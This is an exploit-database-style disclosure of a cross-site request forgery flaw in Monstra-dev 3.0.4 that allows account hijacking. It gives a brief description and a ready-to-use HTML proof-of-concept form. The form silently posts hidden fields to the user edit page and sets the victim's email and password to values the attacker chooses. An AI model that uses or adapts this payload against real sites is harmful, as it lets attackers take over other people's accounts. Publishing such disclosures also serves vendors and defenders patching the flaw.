# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)# Date: 2018-08-04# Exploit Author: Nainsi Gupta# Vendor Homepage: http://monstra.org/# Product Name: Monstra-dev# Version: 3.0.4# Tested on: Windows 10 (Firefox/Chrome)# CVE : N/A# 1. Description# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker# to take over a user account by modifying user's data such as email and password# 2. Exploit and Proof of Concept# To exploit this vulnerability, victim need to be logged in at target site namely# victim.com and visit crafted site made by attacker namely attacker.com. # Then an authenticated POST request will be generated from victim browser and it will# be submit to victim.com to modify user's data to attacker desired value.#POC:CSRF<html><!-- CSRF PoC --><body><script>history.pushState('','','/')</script><form action="http://localhost/monstra-dev/users/2/edit" method="POST"><inputtype="hidden" name="csrf" value="7e172c2a395495f3e4c05912cb9f3f7f0ed8344e"/><inputtype="hidden" name="user_id" value="2"/><inputtype="hidden" name="login" value="guptanainisi95"/><inputtype="hidden" name="firstname" value="sd"/><inputtype="hidden" name="lastname" value="jkh"/><inputtype="hidden" name="email" value="guptanainsi97@gmail.com"/><inputtype="hidden" name="twitter" value=""/><inputtype="hidden" name="skype" value=""/><inputtype="hidden" name="about_me" value="ss"/><inputtype="hidden" name="new_password" value="qaz"/><inputtype="hidden" name="edit_profile" value="Save"/><inputtype="submit" value="Submit request"/></form></body></html>